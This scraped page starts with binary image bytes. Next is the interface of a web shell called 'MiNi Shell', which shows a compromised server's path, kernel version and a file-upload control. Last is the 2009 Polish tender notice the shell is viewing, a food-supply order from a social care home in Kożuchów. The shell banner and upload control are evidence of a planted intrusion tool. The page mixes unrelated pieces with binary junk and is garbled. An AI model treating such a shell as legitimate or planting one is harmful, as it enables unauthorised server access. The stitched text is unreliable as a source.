JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/66450-N-2009.html

<p class="kh_header"><b>Kożuchów: Dostawa artykułów spożywczych w rozbiciu na 12 zadań
tj.;
artykułów ogólnospożywczych, mięsa i jego przetworów, produktów mleczarskich , jaj konsumpcyjnych, pieczywa, ryb, drobiu mrożonego, mrożonek (warzyw i owoców), świeżych warzyw i owoców ,jabłek deserowych , ziemniaków, przypraw.</b><br>
<b>Numer ogłoszenia: 66450 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Szprotawska 19, 67-120 Kożuchów, woj. lubuskie, tel. 0-68 4599391, faks 0-684599393.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa samorzadowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych w rozbiciu na 12 zadań
tj.;
artykułów ogólnospożywczych, mięsa i jego przetworów, produktów mleczarskich , jaj konsumpcyjnych, pieczywa, ryb, drobiu mrożonego, mrożonek (warzyw i owoców), świeżych warzyw i owoców ,jabłek deserowych , ziemniaków, przypraw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wartość zamówienia nie jest równa i nie przekracza kwoty określonej na podstawie przepisu art.11 ust.8  Prawo zamówień publicznych.
Przedmiotem zamówienia jest dostawa artykułów spożywczych w rozbiciu na 12 zadań
tj.;
artykułów ogólnospożywczych, mięsa i jego przetworów, produktów mleczarskich , jaj konsumpcyjnych, pieczywa, ryb, drobiu mrożonego, mrożonek (warzyw             i owoców), świeżych warzyw i owoców ,jabłek deserowych , ziemniaków, przypraw..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.50.00.00-3, 03.14.25.00-3, 15.33.11.00-8, 15.11.20.00-6, 15.20.00.00-0, 15.81.00.00-9, 15.30.00.00-1, 03.22.13.21-9, 15.31.00.00-4, 15.87.21.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający odstapił od wymogu wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia moga ubiegać sie Wykonawcy ,którzy spełniają warunki art.22 ust1tj;- 
 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, je-żeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału tech-nicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie za-mówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez stwierdzenie spełnia/nie spełnia wymaganego warunku..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności i spełnia warunki zawarte w art. 22.1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert. 
b)oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 i art.24  Ustawy Prawo zamówień publicznych (wg załącznika nr 4 );
c)oświadczenie wykonawcy o wdrożeniu systemu HACCP (zał. nr 5)
d)oświadczenie o niezaleganiu  z płatnościami wobec  ZUS KRUS ,Urzędu Skarbowego, Miasta lub Gminy  (zał. nr 6)
 e)podpisany projekt umowy ( załącznik nr 3)
 2. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana przez stwierdzenie spełnia/nie spełnia wymaganego warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat-nowosolski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
 ul. Szprotawska 19 pok.102
 67-120 Kożuchów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 09:00, miejsce: Dom Pomocy Społecznej
 ul. Szprotawska 19 pok.102
 67-120 Kożuchów.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	budyń rózne smaki 60 g
2	barszcz biały a 65g
3	chrzan tarty a 200g
4	cukier kryształ a 1kg
5	cukier wanilowy  a 16g
6	dżemy rózne smaki a 260 g
7	fasola sucha
8	groszek konserwowy a400g
9	grocz łuskany
10	herbata granulowana indyjska
11	herbatniki
12	herbatniki -krakersy
13	kasza jęczmienna wiejska 
14	kasza manna 
15	kasza gryczana
16	kasza kukurydziana
17	kawa zbozowa -INKA- a 150g
18	kwasek cytrynowy 20 g
19	kakao a 100g
20	konserwa wieprz-szynka 320g
21	koncentrat pomidorowy a 900g
22	koncentrat pomidorowy a 200g
23	kukurydza konserwowa a 400g
24	majonez dekoracyjny a 315g
25	makaron zacierka
26	makarony różne
27	maka pszenna typ 500
28	mąka zimniaczana
29	musztarada łagodana 180g
30	olej  uniwersalny 1l
31	olej słonecznikowy 1l 
32	ocet 0,5l
33	płatki owsiane górskie extra 0,5 kg
34	przecier ogórkowy a 300g
35	przyprawa do zup MAGI a 1l
36	pasztet drob prochowicki a 160g
36	ryż długoziarnisty 
37	sałatka szwedzka z ogórków 0,9
38	sałatka sznakomita 0,9
39	soki wieloowocowe 1l
40	soki pomaranczowe 1l
41	soki jabłkowe 1l
42	sól  spozywcza jodowana 
43	zupa piecz, a 65g
44	zaprawa do napoi a330g
45	wafle o róznych smakach
46	woda źródlana gaz/nieg 1L(sezon let).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa miesa i jego przetworów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	wołowina b/ k
2.	karkówka b/k
3.	łopatka z/k b/skóry
4.	biodrówka 
5.	schab b/k
6.	mięso gulszowe
7.	wątroba wp.
8.	serca wp
9.	ozory wp
	
10	blok wieprzowy
11	blok szykowo drob
12	kaszanka cienka
13	kiełbasa zwyczajna
14	kiełbasa sniadaniowa
15	kiełbasa szynkowa
16	kiełbasa mielonka wieprz
17	kiełbasa mielonka drob.
18	kiełbasa parówkowa
19	mielonka drob
20	szynka tyrolska
21	kiełbasa żywiecka
22	kiełbas śląska
23	kiełbsa dolnośląska
24	kiełbasa krakowska parz.
25	kiełbasa kminkowa
26	kiełbasa rożnowa
27	kiełbasa tuchowska
28	metka cebulowa
29	mortadela
30	kiełbasa biała 
31	parówki cielęce cienkie
32	pasztet domowy
33	pieczeń wiedenska
34	ogonówka
35	wątrobianka wędzona
36	salceson włoski
37	salceson ozorkowy 
38	szynka gotowana
39	polędwica sopocka
40	metka żywiecka 
41	kiełbasa jałowcowa
42	boczek wędz parz
43	kiełbasa myśliwska
44	kiełbasa polska.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	mleko w proszku 
2.	jogurt nat. b / cukru a 200g
3.	margaryna mleczna a 200/250g
4.	twaróg półtłusty
5.	śmietana 30% kubek 200g
6.	ser topiony hochlsnd plastry
7.	ser topiony hochland(trójkaty)
8.	sery topione kostka bez dodatków
9.	mleko 2% folia 
10.	srery zółe edamski ,morski
11.	maślanka folia a 1litr
12.	serytwarogowy kanapkowe a 100 g szt
13	twrożek śniadaniowy grani a 150 g
14	margaryna rama 250g
15.	masło extra a 200g.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa jaj konsumpcyjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	jaja konsumpcyjne klasa A  kategoria M.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa warzyw mrożonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	mieszanka warzywna   6-składnikowa(zupa jarzynowa)
2	mieszanka warzywna        4składnik.( włoszczyzna)
3	zupa pieczarkowa mrozona
4	fasolka szparag
5	marchew z groszkiem 
6	brukselka
7	kalafior
8	kalarepa
9	agrest mrożony
10	aronia mrożona
11	śliwka mrożona
12	mieszanka owocowa.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa drobiu mrożonego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	kurczak mrożony  min 1,5kg
2	filet drobiowy
3	żołki drobiowe
4	golonka indycza (święta).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	dorsz tusze mrożone
2	filety rybne z pangi mrożone
	makrela wędzona 
3	konserwy rybne w pomidor a 170g
4	śledź ,szprot ,makrela w puszcze w oleju a170g
5	śledzie matiasy filety.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	chleb balt.żytni    a 600g 
2	chleb pszenny      a 700g
3	chleb graham        a 500g
6	bułka poznanska  a   80g
4	bułka tarta
5	bułka czerstwa
6	drożdżówki
7	pączki 
8	placek drożdżowy
9	babka biszkptowa
10	ciasta tortowe
11	jabłecznik
12	mazurek
13	sernik.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa warzyw -świeżych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	buraki
2	marchew
3	pietruszka korzen
4	seler korzeń
5	cebula
6	kapusta pekinska
7	kapusta biała
8	kapusta włoska 
9	por
10	pieczarki
11	rzodkiew biała
12	czosnek
13	pietruszka nać
14	rzodkiewka 
15	szczypior
16	kapusta kiszona
17	ogórek kiszony
18	cukinia (sezonowo)
19	ogórek swieży(zesonowo)
20	pomidory (sezonowo)
21	kapusta młoda sezonowo)
22	sałata (sezonowo)
23	botwina (sezonowo)
24	koper (sezonowo)
25	truskawki (sezonowo)
26	wisnie ( sezonowo)
27	winogrona 
28	cytryny
29	banany
30	mandarynki
31	pomarańcze.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> dostawa jabłek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	jabłka deserowe kl I.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.13.13.21-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa ziemniaków.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	ziemniaki	
2.	ziemniaki młode.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> dostawa przypraw.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	papryka słodka
2	majeranek
	pieprz naturalny mielony
3	pieprz ziołowy
4	przyprawa do ryb
5	przyprawa warzywna LIDERETTA
6	przyprawa do drobiu
7	liść laurowy
8	ziele angielskie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.21.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com